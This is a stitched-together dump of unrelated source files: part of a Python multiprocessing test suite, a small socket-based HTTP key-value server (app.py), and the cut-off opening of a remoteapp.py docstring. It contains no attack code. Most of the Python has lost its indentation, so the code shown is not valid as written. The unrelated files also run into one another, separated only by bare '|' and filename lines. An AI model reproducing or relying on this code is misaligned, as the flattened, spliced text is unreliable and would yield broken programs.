a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + 60
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
        # The pid should be None in the child process, except for the fork
        # context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
# Stop the ForkServer process if it's running
from multiprocessing import forkserver
forkserver._forkserver._stop()
# bpo-37421: Explicitly call _run_finalizers() to remove immediately
# temporary directories created by multiprocessing.util.get_temp_dir().
multiprocessing.util._run_finalizers()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
app.py
|
import socket
import sys
from threading import Thread
import json
import os
HOST = "127.0.0.1"
PORT = 80
MAX_BUFFER_SIZE = 1024
def main():
initialize_database()
start_server()
# Creates database file
def initialize_database():
# Create database file
if not os.path.exists("db.json"):
with open("db.json", "w+") as db:
db.write("{\n}")
# Read contents of database file
def read_database():
# Read database file
with open("db.json", "r") as db:
storage_file = json.load(db)
return storage_file
# Write content to database file
def write_database(storage_file):
with open("db.json", "w") as file:
json.dump(storage_file, file, indent = 4, sort_keys=True)
# Creates headers for the response
def create_headers(status_code: int, status_text: str, message_body=""):
    # Response headers
response_protocol = "HTTP/1.1"
response_status_code = status_code
response_status_text = status_text
response_content_type = "application/json; encoding=utf8"
response_connection = "close"
response_content_length = str(len(message_body.encode('utf-8')))
# Create response sections
status_line = (
f"{response_protocol} {response_status_code} {response_status_text}\r\n"
)
connection = f"Connection: {response_connection}\r\n"
content_type = f"Content-Type: {response_content_type}\r\n"
content_length = f"Content-Length: {response_content_length}\r\n"
empty_line = f"\r\n"
# Combine into single string
response_header = (
status_line +
connection +
content_type +
content_length +
empty_line +
message_body
)
# Encode string to utf-8 bytes
response_header_encoded = response_header.encode("utf-8")
return response_header_encoded
# Create & start server socket
def start_server():
# Create server socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind socket
try:
server_socket.bind((HOST, PORT))
print(f"Binding server socket to host:{HOST} and port {PORT}")
except:
print(f"Bind failed. Error: {str(sys.exc_info())}")
sys.exit()
# Enable passive listening sockets
server_socket.listen(5)
while True:
# Wait and accept incoming connection
(client_socket, address) = server_socket.accept()
ip, port = str(address[0]), str(address[1])
print(f"Connection from {ip}:{port} has been established.")
try:
Thread(target=client_thread, args=(client_socket, ip, port)).start()
print(f"Client thread for {ip}:{port} has been created.")
except:
print(f"Client thread for {ip}:{port} did not start.")
# Thread for each client
def client_thread(client_socket, ip, port):
    # Listen to incoming data
    data = receive_data(client_socket)
    print(data)
    if data:
        if data[0] == "GET":
            response_headers = do_GET(data)
        elif data[0] == "POST":
            response_headers = do_POST(data)
        elif data[0] == "PUT":
            response_headers = do_PUT(data)
        elif data[0] == "DELETE":
            response_headers = do_DELETE(data)
        else:
            response_headers = create_headers(405, "Method Not Allowed")
        client_socket.send(response_headers)
client_socket.close()
print(f"Connection from {ip}:{port} has been closed.")
print(f"Client thread for {ip}:{port} has been closed.")
# Get content from request
def get_content(data: list):
# Check for content length
if "Content-Length:" in data:
con_len_index = data.index("Content-Length:")
con_len_value = data[con_len_index + 1]
# If there is no actual content
if con_len_value == "0":
return None
else:
return None
# Check for content type
if "Content-Type:" not in data:
return None
# Return content
return data[-1]
# Handle GET request
def do_GET(data: list):
content = get_content(data)
    if content is None:
return create_headers(400, "Bad Request")
storage_data = read_database()
if content in storage_data:
value = storage_data.get(content)
return create_headers(200, "OK", value)
else:
return create_headers(404, "Not Found")
# Handle POST request
def do_POST(data: list):
content = get_content(data)
    if content is None:
return create_headers(400, "Bad Request")
storage_data = read_database()
if content in storage_data:
return create_headers(409, "Conflict")
else:
storage_data[content] = ""
write_database(storage_data)
return create_headers(201, "Created")
# Handle PUT request
def do_PUT(data: list):
content = get_content(data)
    if content is None:
return create_headers(400, "Bad Request")
storage_data = read_database()
content_dict = json.loads(content)
content_key = list(content_dict.keys())[0]
if content_key in storage_data:
storage_data.update(content_dict)
write_database(storage_data)
return create_headers(200, "OK")
else:
return create_headers(404, "Not Found")
# Handle DELETE request
def do_DELETE(data: list):
content = get_content(data)
    if content is None:
return create_headers(400, "Bad Request")
storage_data = read_database()
if content in storage_data:
storage_data.pop(content)
write_database(storage_data)
return create_headers(200, "OK")
else:
return create_headers(404, "Not Found")
# Receive & process data
def receive_data(client_socket):
    client_data = client_socket.recv(MAX_BUFFER_SIZE)
    # Decode the raw bytes and split on whitespace into individual tokens
    decoded_data = client_data.decode("utf-8", errors="replace")
    data_variables = decoded_data.split()
    return data_variables
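# A minimal sketch of a client exercising the server above (hypothetical key
# "foo"; assumes the server is already running on HOST:PORT). The body must be
# a single whitespace-free token, because receive_data() splits the request on
# whitespace and get_content() returns the last token.
def example_request():
    request = (
        "POST / HTTP/1.1\r\n"
        "Content-Type: text/plain\r\n"
        "Content-Length: 3\r\n"
        "\r\n"
        "foo"
    )
    with socket.create_connection((HOST, PORT)) as s:
        s.sendall(request.encode("utf-8"))
        # Print the raw response produced by create_headers()
        print(s.recv(MAX_BUFFER_SIZE).decode("utf-8"))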
if __name__ == "__main__":
main()
|
remoteapp.py
|
'''
A utility for creating "remote applications" which are dcode
